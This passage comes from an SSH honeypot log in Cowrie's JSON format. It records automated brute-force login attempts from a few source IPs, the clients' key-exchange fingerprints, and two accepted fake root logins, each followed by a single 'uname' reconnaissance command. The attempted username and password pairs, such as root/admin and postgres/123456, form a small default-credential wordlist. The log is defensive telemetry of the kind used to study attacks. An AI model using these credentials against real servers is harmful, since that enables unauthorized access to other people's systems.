0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:34:20.669730Z","src_ip":"212.227.125.160","session":"8cb6e01e0df3"}
{"eventid":"cowrie.login.failed","username":"amrita","password":"amrita","message":"login attempt [amrita/amrita] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:21.167083Z","src_ip":"212.227.125.160","session":"8cb6e01e0df3"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:22.447844Z","src_ip":"212.227.125.160","session":"8cb6e01e0df3"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":34566,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b8724f87a27","protocol":"ssh","message":"New connection: 83.168.105.65:34566 (1.2.3.4:22) [session: 5b8724f87a27]","sensor":"my-vps","timestamp":"2025-08-26T11:34:25.204354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:25.205171Z","src_ip":"83.168.105.65","session":"5b8724f87a27"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:34:25.242152Z","src_ip":"83.168.105.65","session":"5b8724f87a27"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql123","message":"login attempt [mysql/mysql123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:25.355374Z","src_ip":"83.168.105.65","session":"5b8724f87a27"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:26.394090Z","src_ip":"83.168.105.65","session":"5b8724f87a27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36268,"dst_ip":"1.2.3.4","dst_port":22,"session":"e32538b39f4a","protocol":"ssh","message":"New connection: 212.227.125.160:36268 (1.2.3.4:22) [session: e32538b39f4a]","sensor":"my-vps","timestamp":"2025-08-26T11:34:26.985335Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:26.986307Z","src_ip":"212.227.125.160","session":"e32538b39f4a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:34:27.037866Z","src_ip":"212.227.125.160","session":"e32538b39f4a"}
{"eventid":"cowrie.login.failed","username":"ts","password":"ts","message":"login attempt [ts/ts] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:27.198034Z","src_ip":"212.227.125.160","session":"e32538b39f4a"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:28.306876Z","src_ip":"212.227.125.160","session":"e32538b39f4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37040,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e2b3828231d","protocol":"ssh","message":"New connection: 212.227.125.160:37040 (1.2.3.4:22) [session: 2e2b3828231d]","sensor":"my-vps","timestamp":"2025-08-26T11:34:32.881840Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:32.911586Z","src_ip":"212.227.125.160","session":"2e2b3828231d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:34:32.941480Z","src_ip":"212.227.125.160","session":"2e2b3828231d"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:34:33.158466Z","src_ip":"212.227.125.160","session":"2e2b3828231d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:34:33.298885Z","src_ip":"212.227.125.160","session":"2e2b3828231d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:34:33.299567Z","src_ip":"212.227.125.160","session":"2e2b3828231d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:33.353171Z","src_ip":"212.227.125.160","session":"2e2b3828231d"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:33.354272Z","src_ip":"212.227.125.160","session":"2e2b3828231d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37806,"dst_ip":"1.2.3.4","dst_port":22,"session":"58926e4b6675","protocol":"ssh","message":"New connection: 212.227.125.160:37806 (1.2.3.4:22) [session: 58926e4b6675]","sensor":"my-vps","timestamp":"2025-08-26T11:34:38.140589Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:38.187798Z","src_ip":"212.227.125.160","session":"58926e4b6675"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:34:38.258265Z","src_ip":"212.227.125.160","session":"58926e4b6675"}
{"eventid":"cowrie.login.failed","username":"rajesh","password":"rajesh","message":"login attempt [rajesh/rajesh] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:38.761168Z","src_ip":"212.227.125.160","session":"58926e4b6675"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:39.985196Z","src_ip":"212.227.125.160","session":"58926e4b6675"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":56740,"dst_ip":"1.2.3.4","dst_port":22,"session":"816dc3acccc5","protocol":"ssh","message":"New connection: 83.168.105.65:56740 (1.2.3.4:22) [session: 816dc3acccc5]","sensor":"my-vps","timestamp":"2025-08-26T11:34:40.625336Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:40.626380Z","src_ip":"83.168.105.65","session":"816dc3acccc5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:34:40.663298Z","src_ip":"83.168.105.65","session":"816dc3acccc5"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:34:40.775426Z","src_ip":"83.168.105.65","session":"816dc3acccc5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:34:40.909220Z","src_ip":"83.168.105.65","session":"816dc3acccc5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:34:40.909889Z","src_ip":"83.168.105.65","session":"816dc3acccc5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:40.947229Z","src_ip":"83.168.105.65","session":"816dc3acccc5"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:40.948439Z","src_ip":"83.168.105.65","session":"816dc3acccc5"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":36052,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7d9e0aa4625","protocol":"ssh","message":"New connection: 196.251.86.249:36052 (1.2.3.4:22) [session: c7d9e0aa4625]","sensor":"my-vps","timestamp":"2025-08-26T11:34:42.657112Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:43.195473Z","src_ip":"196.251.86.249","session":"c7d9e0aa4625"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:34:43.196439Z","src_ip":"196.251.86.249","session":"c7d9e0aa4625"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38574,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f1173119a57","protocol":"ssh","message":"New connection: 212.227.125.160:38574 (1.2.3.4:22) [session: 7f1173119a57]","sensor":"my-vps","timestamp":"2025-08-26T11:34:44.009374Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:44.017800Z","src_ip":"212.227.125.160","session":"7f1173119a57"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:34:44.083195Z","src_ip":"212.227.125.160","session":"7f1173119a57"}
{"eventid":"cowrie.login.failed","username":"user2","password":"123456","message":"login attempt [user2/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:44.283544Z","src_ip":"212.227.125.160","session":"7f1173119a57"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"1q2w3e4r","message":"login attempt [hadoop/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:44.770844Z","src_ip":"196.251.86.249","session":"c7d9e0aa4625"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:45.336722Z","src_ip":"212.227.125.160","session":"7f1173119a57"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:46.301039Z","src_ip":"196.251.86.249","session":"c7d9e0aa4625"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39344,"dst_ip":"1.2.3.4","dst_port":22,"session":"f44d52c85967","protocol":"ssh","message":"New connection: 212.227.125.160:39344 (1.2.3.4:22) [session: f44d52c85967]","sensor":"my-vps","timestamp":"2025-08-26T11:34:49.492914Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:49.494783Z","src_ip":"212.227.125.160","session":"f44d52c85967"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:34:49.551337Z","src_ip":"212.227.125.160","session":"f44d52c85967"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456","message":"login attempt [postgres/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:50.343153Z","src_ip":"212.227.125.160","session":"f44d52c85967"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:51.395071Z","src_ip":"212.227.125.160","session":"f44d52c85967"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40116,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc3966086390","protocol":"ssh","message":"New connection: 212.227.125.160:40116 (1.2.3.4:22) [session: fc3966086390]","sensor":"my-vps","timestamp":"2025-08-26T11:34:55.822506Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:55.860428Z","src_ip":"212.227.125.160","session":"fc3966086390"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:34:55.895877Z","src_ip":"212.227.125.160","session":"fc3966086390"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic","message":"login attempt [elastic/elastic] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:56.147271Z","src_ip":"212.227.125.160","session":"fc3966086390"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":52820,"dst_ip":"1.2.3.4","dst_port":22,"session":"fde81fff5ce5","protocol":"ssh","message":"New connection: 83.168.105.65:52820 (1.2.3.4:22) [session: fde81fff5ce5]","sensor":"my-vps","timestamp":"2025-08-26T11:34:56.160661Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:56.161549Z","src_ip":"83.168.105.65","session":"fde81fff5ce5"}
